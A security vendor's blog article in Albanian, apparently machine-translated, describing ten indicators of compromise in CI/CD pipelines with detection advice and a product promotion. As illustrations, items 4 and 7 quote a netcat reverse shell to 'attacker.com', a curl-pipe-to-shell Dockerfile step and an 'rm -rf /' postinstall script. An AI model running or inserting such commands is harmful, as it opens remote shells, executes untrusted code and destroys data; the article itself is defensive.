10 Treguesit Kryesorë të Kompromisit në CI/CD Pipelines

Hyrje: Cilat janë treguesit e kompromisit në sigurinë kibernetike?

Treguesit e kompromentimit janë shenjat e para paralajmëruese se sistemi juaj ose pipeline mund të jetë nën sulm. Me fjalë të thjeshta, treguesit e kompromisit janë gjurmë të lëna nga sulmuesit, si të çuditshme logins, ndryshime në skedarë ose programe keqdashëse të fshehura. Në Siguria kibernetike e IOC-së, ato veprojnë si gjurmë gishtash në vendin e një krimi, duke ju dhënë prova të qarta se diçka nuk shkon. Prandaj, kur zhvilluesit pyesin Cilat janë treguesit e kompromisit, përgjigjja nuk kufizohet vetëm te serverat ose firewall-et, ajo përfshin edhe rreziqet e fshehura në botën moderne. CI/CD pipelines.

Në këto pipelines, sulmuesit mund të ndërhyjnë në kod, të injektojnë varësi dashakeqe ose të ndryshojnë hapat e ndërtimit pa u vënë re. Megjithatë, shumica e udhëzuesve ende përqendrohen vetëm në servera ose rrjete. Si rezultat, zinxhiri i furnizimit të softuerëve është bërë një nga objektivat më të lehtë.

Kjo është arsyeja pse gjetja e treguesve të kompromisit në CI/CD pipelines është thelbësore. Mbi të gjitha, i ndihmon ekipet të bllokojnë programet keqdashëse, të mbrojnë sekretet dhe të sigurojnë çdo hap të ofrimit të softuerit.

10 Treguesit Kryesorë të Kompromisit në CI/CD Pipelines

Kur shpjegojnë treguesit e kompromentimit, shumica e listave përqendrohen te serverat ose rrjetet. Megjithatë, në CI/CD pipelines, sulmuesit lënë gjurmë gishtash shumë të ndryshme. Njohja e këtyre sinjaleve është thelbësore për mbrojtjen proaktive. Më poshtë janë 10 sinjalet e kuqe të sigurisë kibernetike të IOC-së që çdo zhvillues dhe inxhinier sigurie duhet t'i ketë parasysh.

1. Ndryshime të dyshimta të varësisë

Një nga treguesit kryesorë të kompromisit në pipelines është një përditësim i papritur dhe i çuditshëm i varësisë. Sulmuesit shpesh përdorin besimin që zhvilluesit vendosin te menaxherët e paketave për të shtuar paketa të rrezikshme.

Për shembull, në npm a package.json ndryshimi mund të përfshijë papritur:

Ndryshime të tilla mund të duken të sigurta, por mund të injektojnë kod të trojanizuar në çdo ndërtim.

ndikimi: Ndërtimet e kompromentuara trashëgojnë programe keqdashëse në burim.

Zbulim: zbatoni rishikimet e varësive, gjurmoni ndryshimet e skedarëve të kyçur dhe skanoni paketa të reja gjatë gjithë kohës.

2. Kod i turbullt në ndërtime 

Autorët e programeve keqdashëse mbështeten në errësimin e përmbajtjes për të anashkaluar vlerësimet. Si rezultat, ky tregues i kompromentimit në CI/CD pipelines mund të jetë një nga më të vështirat për t'u kapur. Në fakt, ngarkesat e ngatërruara shpesh futen në biblioteka me burim të hapur ose imazhe kontejnerësh pa paralajmërim.

Për shembull:

  • Një paketë PyPI duke përdorur base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • Një imazh Docker i mbushur me binare UPX jo të nevojshme.
  • JavaScript plot me \x41\x42 shpëton duke u fshehur nga vjedhësit e kredencialeve.

ndikimi: Kodi i fshehur ekzekutohet në heshtje gjatë ndërtimit ose kohës së ekzekutimit, gjë që e bën këtë një sinjal kritik në sigurinë kibernetike të IOC.
Zbulim: Kombinoj SAST me skanim të programeve keqdashëse për të sinjalizuar kodin e koduar ose të paketuar. Mbi të gjitha, trajtojeni errësimin si një flamur të kuq që meriton hetim të mëtejshëm.

3. Sekretet e zbuluara në Git: Një rrezik klasik i sigurisë kibernetike të IOC-së

CI/CD pipelineshpesh trashëgojnë sekrete direkt nga depot. Megjithatë, kur shfaqen sekrete në Git, ato bëhen një nga përgjigjet më të qarta për pyetjen "cilët janë treguesit e kompromisit në pipelines?” Pasi kredencialet arrijnë në Git, sulmuesit mund t'i shfrytëzojnë ato për një kohë të pacaktuar.

Për shembull:

  • A .env skedari që përmban AWS_SECRET_KEY=.
  • Tokenët e futur brenda config.json.
  • Sekretet janë ende të dukshme në historinë e Git edhe pas heqjes.

ndikimi: Çelësat e ekspozuar u japin sulmuesve qasje të drejtpërdrejtë në CI/CD pipelines, sisteme cloud ose baza të dhënash. Prandaj, ky është një nga treguesit më të rrezikshëm të kompromentimit.
Zbulim: përdorim pre-commit hooks dhe punët CI për skanim sekret, dhe anuloni menjëherë çelësat e rrjedhur. Përveç kësaj, zbatoni korrigjimin automatik për të zvogëluar dritaret e ekspozimit.

4. I manipuluar Pipeline Konfigurimet: Tregues të fshehur të kompromisit

Pipeline konfigurimet janë objektiva me vlerë të lartë sepse një modifikim i vetëm shpesh pengon të gjithë rrjedhën e punësSi pasojë, i manipuluar pipeline Skedarët janë një rrezik i madh për sigurinë kibernetike të IOC-së që mjetet tradicionale të monitorimit rrallë e zbulojnë.

Për shembull:

  • Në Veprimet e GitHub:

  • Në GitLab: një punë keqdashëse u shtua në .gitlab-ci.yml që hedh të dhëna të ndjeshme.
  • Në Jenkins: sh "nc -e /bin/bash attacker.com 4444".

ndikimi: Këto ndryshime të pamiratuara e kthejnë pipeline në një derë të pasme të përhershme për sulmuesit, gjë që qartësisht llogaritet si një tregues i kompromentimit.
Zbulim: Zbatoni konfigurimet e nënshkruara, kërkoni miratimet e PR dhe monitoroni për punë të papritura. Përveç kësaj, vendosni guardrails që bllokojnë automatikisht rrjedhat e punës të ndryshuara.

5. I privilegjuar IaC defaults 

Përkufizimet e infrastrukturës së konfiguruar gabimisht shpesh krijojnë dyer të fshehta. Si rezultat, parazgjedhjet e privilegjuara në IaC janë një rrezik klasik i sigurisë kibernetike të IOC-së.

Për shembull:

  • Një vendosje Kubernetes që jep pod-e privileged: true.
  • Grafikët e Helm që ekspozojnë shërbimet me 0.0.0.0:22.

ndikimi: Sulmuesit fitojnë akses në nivelin root ose ekspozojnë publikisht shërbimet e brendshme. Si pasojë, këto probleme e zgjerojnë ndjeshëm sipërfaqen e sulmit.
Zbulim: Aplikoni IaC skanimi për të zbatuar privilegjin më të vogël para bashkimit. Përveç kësaj, sigurohuni që çdo konfigurim të rishikohet si pjesë e pipeline.

6. Sjellje të pazakonta ndërtimi 

Sulmuesit shpesh ndryshojnë pipeline sjellje për të rrëshqitur në veprime keqdashëse. Me fjalë të tjera, aktiviteti i pazakontë i ndërtimit është një nga përgjigjet më të qarta për atë që janë tregues të kompromentimit në CI/CD pipelines.

Për shembull:

  • Ndërton duke bërë kërkesa dalëse të rrjetit në domene të çuditshme.
  • Një projekt Node.js papritmas shfaqi PowerShell gjatë npm install.
  • Një punë CI që shkarkon skedarë binare të mëdhenj që nuk janë përcaktuar në skriptet e ndërtimit.

ndikimi: Ndërtimet e kompromentuara mund të veprojnë si pika shpërndarjeje të programeve keqdashëse. Mbi të gjitha, ato përhapin ngarkesa keqdashëse në çdo instalim.
Zbulim: Monitoroni regjistrat e ndërtimit për procese ose lidhje të papritura. Për më tepër, konfiguroni zbulimin e anomalive për të sinjalizuar sjellje jashtë normës.

7. Skriptet e paketave keqdashëse si rreziqe kibernetike të IOC-së

Menaxherët e paketave mbështesin ciklin jetësor hooks që sulmuesit i shfrytëzojnë. Prandaj, skriptet keqdashëse në npm, PyPI ose Dockerfiles janë tregues të fortë të kompromentimit.

Për shembull:

  • npm: postinstall skripti po ekzekutohet rm -rf / ose sinjalizim për një C2.
  • PyPI: setup.py duke ekzekutuar kodin e fshehur Python gjatë instalimit.
  • Dockerfile: RUN curl attacker.sh | sh.

ndikimi: Sulmi ekzekutohet gjatë instalimit, përpara çdo testimi në kohën e ekzekutimit. Si pasojë, zhvilluesit mund të mos e vënë re derisa të jetë tepër vonë.
Zbulim: Skano manifestet e paketave për skripte instalimi. Përveç kësaj, kufizo rreziqet hooks in CI/CD vende pune për të zvogëluar ekspozimin.

8. Treguesit e Kompromentimit të Helmimit të Regjistrit

Sulmuesit zëvendësojnë ose modifikojnë objektet në regjistra, dhe këto ngjarje janë shembuj shkollorë të asaj që janë tregues të kompromentimit në zinxhirin e furnizimit. pipelines.

Për shembull:

  • Një etiketë imazhi Docker u përditësua në heshtje me një shtresë të trojanizuar.
  • Një paketë e brendshme e zëvendësuar me një version të helmuar.
  • squatting i hapësirës së emrave npm, si p.sh. lodash-proxy.

ndikimi: Çdo ndërtim që përdor objektin e regjistrit kompromentohet. Jo vetëm kaq, por kompromentimi përhapet në shërbimet e rrjedhës së poshtme.
Zbulim: Zbatoni kontrollet e nënshkrimit dhe integritetit në të gjitha tërheqjet e regjistrit. Përveç kësaj, gjurmoni origjinën e artefakteve me SBOM vlefshmëria

9. Aktiviteti anormal i përdoruesit si provë e IOC-së

Llogaritë e kompromentuara pothuajse gjithmonë lënë pas gjurmë anormale. Prandaj, sjellja e pazakontë e zhvilluesit është një tregues i fortë i kompromentimit.

Për shembull:

  • Commitu shty në orën 3 të mëngjesit sipas kohës lokale.
  • Miratimet e PR nga llogaritë me pushime.
  • Pipelines shkaktohet me frekuencë të pazakontë.

ndikimi: Sulmuesit abuzojnë me kredencialet e vjedhura për të futur ndryshime dashakeqe. Në fund të fundit, të paautorizuarat commitpërzihen lehtësisht në rrjedhat normale të punës.
Zbulim: Monitor SCM aktivitet për anomali, zbatoni MFA-në dhe rrotulloni tokenët rregullisht. Përveç kësaj, njoftoni për dyshime commit ose modelet e miratimit.

10. Kontrollet e dështuara të integritetit ose nënshkrimit në sigurinë kibernetike të IOC-së

Një gjë e zakonshme, por e injoruar tregues i kompromisit është një kontroll i dështuar i integritetit ose nënshkrimit. Në sigurinë kibernetike të IOC, këto kontrolle verifikojnë që kodi ose artefaktet janë autentike. Anashkalimi i tyre lë pipelinetë ekspozuara.

Shembuj:

  • Një hash SHA256 nuk përputhet me shumën e kontrollit të pritur.
  • Një nënshkrim GPG i munguar ose i pavlefshëm.
  • An SBOM duke treguar objekte të panënshkruara.

ndikimi: Dështimet e integritetit shpesh nënkuptojnë ndërhyrje, helmim të regjistrit ose injektim të programeve keqdashëse.

Zbulim: Automatizoni kontrollet e nënshkrimeve, zbatoni validimin e shumës së kontrollit dhe bllokoni komponentët e panënshkruar. Mbi të gjitha, trajtoni çdo kontroll të dështuar si provë të qartë të kompromentimit.

CI/CD Treguesit e Kompromisit në një vështrim

Treguesi i Kompromisit (IOC) Ndikimi në CI/CD Pipelines Si të zbulohet
Ndryshime të Dyshimta të Varësisë Sulmuesit injektojnë librari dashakeqe në menaxherët e paketave, duke çuar në ndërtime të kompromentuara. Gjurmoni ndryshimet e skedarëve të kyçur, zbatoni rishikimet e varësive dhe skanoni varësitë vazhdimisht.
Kod i turbullt në ndërtime Ngarkesat e fshehura ekzekutohen gjatë ndërtimit ose kohës së ekzekutimit pa u zbuluar. përdorim SAST dhe skanimi i programeve keqdashëse për të sinjalizuar modelet base64, hex ose të kodit të paketuar.
Sekretet e Zbuluara në Git Tokenët ose çelësat API të rrjedhur u japin sulmuesve akses të drejtpërdrejtë në sistemet kritike. Ekzekutoni skanime sekrete në Git hooks dhe të anulojë automatikisht kredencialet e rrjedhura.
I manipuluar Pipeline Konfigurimin Flukset e punës të modifikuara lejojnë nxjerrjen ose ruajtjen e të dhënave brenda tyre. CI/CD. Kërko miratimet e PR, zbato konfigurimet e nënshkruara dhe monitoro pipeline ndryshime.
Të privilegjuar IaC defaults Rolet tepër lejuese ose parazgjedhjet e pasigurta ekspozojnë mjediset në cloud. Skanoni skedarët Terraform, Kubernetes dhe Helm për zbatimin e privilegjeve më të pakta.
Sjellje të pazakonta ndërtimi Pipelinepërdoren si pika shpërndarjeje të malware-it ose për lëvizje anësore. Analizoni regjistrat e ndërtimit për shkarkime, procese ose thirrje dalëse të papritura.
Skripte të Paketave të Dëmshme Skriptet e fshehura para/pas instalimit aktivizojnë ngarkesa para testimit në kohën e ekzekutimit. Blloko skriptet e rrezikshme npm/PyPI dhe kufizo ekzekutimin në CI/CD Punë.
Helmimi i Regjistrit Artefaktet e trojanizuara zëvendësojnë imazhet ose skedarët binare të besuar në regjistra. Verifikoni shumat e kontrollit, zbatoni validimin e nënshkrimit dhe skanoni regjistrat në mënyrë proaktive.
Aktiviteti anormal i përdoruesit Llogaritë e kompromentuara nxisin programe keqdashëse commits ose shkaktar pipelines. Zbatoni MFA-në, monitoroni commits për anomali, dhe analizoni login modele.
Kontrollet e dështuara të integritetit ose nënshkrimit Tregon kod të manipuluar, varësi ose imazhe që hyjnë në pipeline. Automatizoni kontrollet e integritetit dhe bllokoni komponentët e panënshkruar ose të papajtueshëm.

Pse mungon siguria tradicionale kibernetike e IOC-së CI/CD Rreziqet

Shumica e organizatave tashmë monitorojnë treguesit e kompromentimit në servera, kompjutera ose rrjete. Megjithatë, kjo qasje klasike ndaj sigurisë kibernetike të IOC i injoron CI/CD pipelines, të cilat tani janë një nga sipërfaqet më kritike të sulmit. Në fakt, pipelinetregojnë sinjale unike kompromisi që mjetet tradicionale nuk mund t'i zbulojnë.

Treguesit e Kompromisit në Sigurinë Tradicionale

Në sigurinë kibernetike konvencionale të IOC-së, fokusi zakonisht është në:

  • pazakontë logins ose adresa IP që sugjerojnë kredenciale të vjedhura.
  • Hashime të dyshimta të skedarëve ose ndryshime në regjistër që zbulojnë programe keqdashëse.
  • Trafik i papritur dalës që tregon për nxjerrje të të dhënave.

Këta janë tregues të njohur që gjurmohen edhe në Kuadri MITER ATT&CK, i cili hartëzon sjelljet dhe taktikat e zakonshme të kundërshtarëve. Këto janë sinjale të dobishme. Megjithatë, ato zbatohen kryesisht për sistemet operative ose rrjetet e korporatave. Si rezultat, ato nuk i kushtojnë vëmendje ndërhyrjeve delikate që ndodhin më herët në zinxhirin e furnizimit të softuerëve.

Pse CI/CD PipelineJanë të Ndryshme

CI/CD pipelinejanë mjedise të automatizuara ku zhvilluesit commit kodin, varësitë e tërheqjes dhe ndërtimet e lëshimeve. Sulmuesit e dinë se një kompromis këtu përhapet në çdo vendosje. Prandaj, cilët janë treguesit e kompromisit në CI/CD pipelines? Ato duken shumë ndryshe:

  • Një varësi keqdashëse e shtuar në heshtje te package.json ose requirements.txt.
  • Çelësat ose tokenët API të ekspozuar në Git commitskedarët s ose .env.
  • Kod i turbullt i injektuar në paketat npm ose PyPI.
  • Skedarët Terraform ose Kubernetes me parazgjedhje të pasigurta si privilegjuar: true.
  • Pipeline punë të modifikuara për të nxjerrë të dhëna ose për të hapur dyer të pasme.

Këto sinjale kompromisi në CI/CD mbeten të padukshme për standard mjetet e sigurisë.

Boshllëku në sigurinë kibernetike të IOC-së

Edhe pse shumë ekipe e kuptojnë vlerën e treguesve të kompromentimit, ata ende mbështeten vetëm në zbulimin nga serverat dhe regjistrat e rrjetit. Prandaj, sulmuesit mund të helmojnë versionet ose të fusin programe keqdashëse pa lënë gjurmët e zakonshme. Kjo është arsyeja pse incidente të tilla si dera e pasme e XZ Utils ose paketat keqdashëse npm nuk u zbuluan derisa arritën në prodhim.

Këto lloje komprometimesh të zinxhirit të furnizimit theksohen gjithashtu nga CISUdhëzimet e A-së për sigurinë e zinxhirit të furnizimit, e cila paralajmëron se sulmuesit synojnë gjithnjë e më shumë CI/CD pipelinedhe regjistrat.

Miratimi

Siguria kibernetike tradicionale e IOC është e nevojshme, por jo e mjaftueshme. Mbi të gjitha, ekipet duhet të njohin treguesit e kompromentimit specifik për CI/CD pipelines. Vetëm atëherë ata mund të zbulojnë kodin keqdashës ose pipeline abuzimi përpara se të përhapet në të gjithë mjediset.

mjetet-e-për-përbërjes-së-softuerit-sca-tools
Përparësoni, korrigjoni dhe siguroni rreziqet e softuerit tuaj
Merrni Llogarinë tuaj Falas.
Nuk kërkohet kartë krediti.

Siguroni Zhvillimin dhe Ofrimin e Softuerit tuaj

me Xygeni Product Suite